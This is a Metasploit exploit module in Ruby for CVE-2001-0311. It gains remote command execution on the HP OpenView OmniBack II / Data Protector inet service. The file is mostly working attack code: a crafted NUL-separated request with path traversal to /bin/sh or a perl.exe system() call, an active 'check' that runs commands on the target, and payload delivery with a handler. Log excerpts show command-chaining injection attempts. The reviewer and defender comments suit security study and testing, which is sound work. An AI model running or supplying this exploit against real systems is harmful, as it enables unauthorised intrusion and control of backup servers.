##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2001-0311: command execution through the HP OpenView
# OmniBack II (later branded "Data Protector") inet service, which this module
# contacts on TCP 5555 by default (see Opt::RPORT below).
#
# Both #check and #exploit build the same NUL-separated request buffer ("poof");
# the only difference between them is the command carried in it.
#
# NOTE(review): #check is an active probe, not a passive version test -- on both
# targets it makes the service run a command ("echo /etc/*" on Unix,
# "system(dir)" through perl.exe on Windows) and inspects the reply.  The log
# excerpts kept in #exploit show that the Windows service records refused
# request-28 parameters together with the originating host, so probes of this
# kind leave a trace in the Data Protector inet log.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Module metadata and options.
  #
  # 'Platform' lists only 'unix' although a 'Windows' target exists: per the
  # description the Windows target is driven with the unix/cmd/generic payload
  # (CMD set by the operator) and only a handful of characters reach the
  # command line there, so the 1024-byte 'Space' effectively applies to the
  # Unix target only.  'RequiredCmd' restricts the offered cmd payloads to the
  # generic / perl / telnet families.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HP OpenView OmniBack II Command Execution',
      'Description'    => %q{
          This module uses a vulnerability in the OpenView Omniback II
        service to execute arbitrary commands. This vulnerability was
        discovered by DiGiT and his code was used as the basis for this
        module.

        For Microsoft Windows targets, due to module limitations, use the
        "unix/cmd/generic" payload and set CMD to your command. You can only
        pass a small amount of characters (4) to the command line on Windows.
      },
      'Author'         => [ 'hdm', 'aushack' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2001-0311'],
          ['OSVDB', '6018'],
          ['BID', '11032'],
          ['URL', 'http://www.securiteam.com/exploits/6M00O150KG.html'],
        ],
      'Platform'       => ['unix'], # win
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 1024,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet',
            }
        },
      'Targets'        =>
        [
          [ 'Unix', { }],
          [ 'Windows', { }],
        ],
      'DisclosureDate' => '2001-02-28',
      'DefaultTarget'  => 0))

    # Default port of the OmniBack / Data Protector inet listener.
    register_options(
      [
        Opt::RPORT(5555)
      ])
  end

  # Active vulnerability check (see the class comment: this runs a command on
  # the target).
  #
  # Returns Exploit::CheckCode::Vulnerable when the expected command output
  # comes back, Exploit::CheckCode::Safe when the service does not reply or
  # the reply lacks the expected marker.
  #
  # NOTE(review): when target.name matches neither /Unix/ nor /Windows/ the
  # method falls off the end and returns nil instead of a CheckCode; an
  # explicit Exploit::CheckCode::Unknown would be the usual choice.  The
  # Windows branch also reports with print_status where the Unix branch uses
  # vprint_status, so the two branches differ in verbosity.
  def check

    if (target.name =~ /Unix/)
      connect

      # Request buffer.  Fields are NUL-separated; judging from the Windows
      # log lines quoted in #exploit ("A request 28 (...)"), the "28" field
      # appears to be the request number and the field after it the
      # parameter -- here a traversal to /bin/sh -- TODO confirm against the
      # protocol.
      poof =
        "\x00\x00\x00.2"+
        "\x00 a"+
        "\x00 0"+
        "\x00 0"+
        "\x00 0"+
        "\x00 A"+
        "\x00 28"+
        "\x00/../../../bin/sh"+
        "\x00\x00"+
        "digit "+
        "AAAA\n\x00"

      sock.put(poof)
      # Probe command: the reply is expected to contain /etc entries.
      sock.put("echo /etc/*;\n")
      res = sock.get_once(-1, 5)
      disconnect

      # get_once may return nil on timeout; treat no data as not vulnerable.
      if !(res and res.length > 0)
        vprint_status("The remote service did not reply to our request")
        return Exploit::CheckCode::Safe
      end

      # Any of these names in the output means the echo ran on the target.
      if (res =~ /passwd|group|resolv/)
        vprint_status("The remote service is exploitable")
        return Exploit::CheckCode::Vulnerable
      end

      return Exploit::CheckCode::Safe
    end

    if (target.name =~ /Windows/)
      connect

      # Same request layout as the Unix branch, but the parameter names
      # perl.exe and the next field carries its arguments (-e system(dir)).
      poof =
        "\x00\x00\x00.2"+
        "\x00 a"+
        "\x00 0"+
        "\x00 0"+
        "\x00 0"+
        "\x00 A"+
        "\x00 28"+
        "\x00\\perl.exe"+
        "\x00\x20-e\x20system(dir)\x00\x00"+
        "digit "+
        "AAAA\n\x00"

      sock.put(poof)
      res = sock.get_once(-1, 5)
      disconnect

      # to_s keeps this safe when res is nil; the raw reply is echoed before
      # the emptiness check below.
      print_status(res.to_s)

      if !(res and res.length > 0)
        print_status("The remote service did not reply to our request")
        return Exploit::CheckCode::Safe
      end

      # "Volume" with one arbitrary byte between letters -- presumably the
      # UTF-16 output of "dir" (each letter followed by a NUL); verify.
      if (res =~ /V.o.l.u.m.e/) #Unicode
        print_status("The remote service is exploitable")
        return Exploit::CheckCode::Vulnerable
      end

      return Exploit::CheckCode::Safe
    end
  end

  # Delivers the selected cmd payload.
  #
  # Unix: the request buffer points the service at /bin/sh and the encoded
  # payload is written afterwards as the shell input.  Windows: the encoded
  # payload is embedded directly in the perl -e argument inside the request
  # buffer; no follow-up write is made (that line is commented out).  In both
  # branches the first reply is printed raw and then the payload handler is
  # started.
  def exploit
    if (target.name =~ /Unix/)
      connect

      # Same buffer as in #check.
      poof =
        "\x00\x00\x00.2"+
        "\x00 a"+
        "\x00 0"+
        "\x00 0"+
        "\x00 0"+
        "\x00 A"+
        "\x00 28"+
        "\x00/../../../bin/sh"+
        "\x00\x00"+
        "digit "+
        "AAAA\n\x00"

      sock.put(poof)
      sock.put(payload.encoded + ";\n")
      res = sock.get_once(-1, 5)

      # No reply within the timeout: give up without starting the handler.
      if !(res and res.length > 0)
        print_status("The remote service did not reply to our request")
        disconnect
        return
      end

      print(res)

      handler
      disconnect
    end

    if (target.name =~ /Windows/)

      # aushack
      #
      # Tested during pen test against Windows 2003 server.
      # Windows Service details:
      # - Data Protector Inet
      # -> [HP OpenView Storage Data Protector] - Backup client service
      # -> "C:\Program Files\OmniBack\bin\omniinet.exe"
      # -> OmniInet service for Windows NT
      # -> File version: 6.0.0.0
      #
      # This needs to be cleaned up later. Preferably using the Windows/cmd/perl payloads.
      #
      # Notes:
      # I was unable to use directory traversal, OR (||) or AND (&&) techniques to directly run cmd.exe
      # Perhaps a difference in Windows/Unix code? Logs:
      #
      # (Defender note: each refused attempt below was written to the inet
      # log with the parameter and the source host -- a usable audit trail.)
      #
      #11/11/2008 12:18:37 PM INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
      #A request 28 (..\foo.exe) came from host [attacker] which is not a cell manager of this client
      #
      #11/11/2008 12:18:37 PM INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
      #[RxNtIntegUtil] parameter refused: ..\foo.exe
      #
      #11/11/2008 12:21:59 PM INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
      #A request 28 (x.exe || cmd /c dir > c:) came from host [attacker] which is not a cell manager of this client
      #
      #11/11/2008 12:21:59 PM INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
      #[RxNtIntegUtil] parameter refused: x.exe || cmd /c dir > c:
      #
      #11/11/2008 12:22:40 PM INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
      #A request 28 (perl.exe && cmd /c dir >) came from [attacker] which is not a cell manager of this client
      #
      #11/11/2008 12:22:40 PM INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
      #[RxNtIntegUtil] parameter refused: perl.exe && cmd /c dir >

      connect

      # As in #check, but the perl -e argument now wraps the encoded payload.
      poof =
        "\x00\x00\x00.2"+
        "\x00 a"+
        "\x00 0"+
        "\x00 0"+
        "\x00 0"+
        "\x00 A"+
        "\x00 28"+
        "\x00\\perl.exe"+
        "\x00\x20-esystem(#{payload.encoded})\x00\x00"+
        "digit "+
        "AAAA\n\x00"

      sock.put(poof)
      # Left disabled: the payload already travels inside the request buffer.
      #sock.put(payload.encoded + "\n")
      res = sock.get_once(-1, 5)

      # No reply within the timeout: give up without starting the handler.
      if !(res and res.length > 0)
        print_status("The remote service did not reply to our request")
        disconnect
        return
      end

      print(res)

      handler
      disconnect
    end
  end
end